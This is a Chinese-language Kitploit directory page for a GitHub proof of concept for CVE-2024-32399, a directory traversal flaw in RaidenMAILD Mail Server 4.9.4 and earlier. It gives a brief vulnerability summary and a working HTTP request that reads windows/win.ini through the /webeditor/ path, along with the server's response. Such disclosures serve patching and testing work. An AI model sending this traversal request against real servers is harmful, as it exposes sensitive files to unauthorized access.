Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-32399 — 针对 RaidenMAILD Mail Server <=4.9.4 中目录遍历漏洞 (CVE-2024-32399) 的概念验证漏洞利用代码,演示通过 /webeditor/ 组件实现远程敏感文件泄露。 | Kitploit
工具/GitHubGitHub/nn0b0dy/cve-2024-32399
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubnn0b0dy/cve-2024-32399

CVE-2024-32399

针对 RaidenMAILD Mail Server <=4.9.4 中目录遍历漏洞 (CVE-2024-32399) 的概念验证漏洞利用代码,演示通过 /webeditor/ 组件实现远程敏感文件泄露。

查看仓库
122年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-32399

漏洞概述

RaidenMAILD邮件服务器v4.9.4及之前版本中存在目录遍历漏洞,允许远程攻击者通过/webeditor/组件获取敏感信息。

漏洞类型

目录遍历

厂商

RaidenMAILD邮件服务器

受影响版本

RaidenMAILD邮件服务器 <= 4.9.4

漏洞利用验证(PoC)

请求:

root@kitploit:~
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

响应:

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment; filename="../../../windows/win.ini";
Content-Type: application/octet-stream
Content-Length: 403
Date: Mon, 22 Apr 2024 15:00:41 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Permissions-Policy: geolocation=(self "https://example.com"), microphone=()
Referrer-Policy: no-referrer
Content-Security-Policy: base-uri 'self'
Set-Cookie: IDHTTPSESSIONID=9E5BgVAlG7P7C5X; Path=/

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
...
下载工具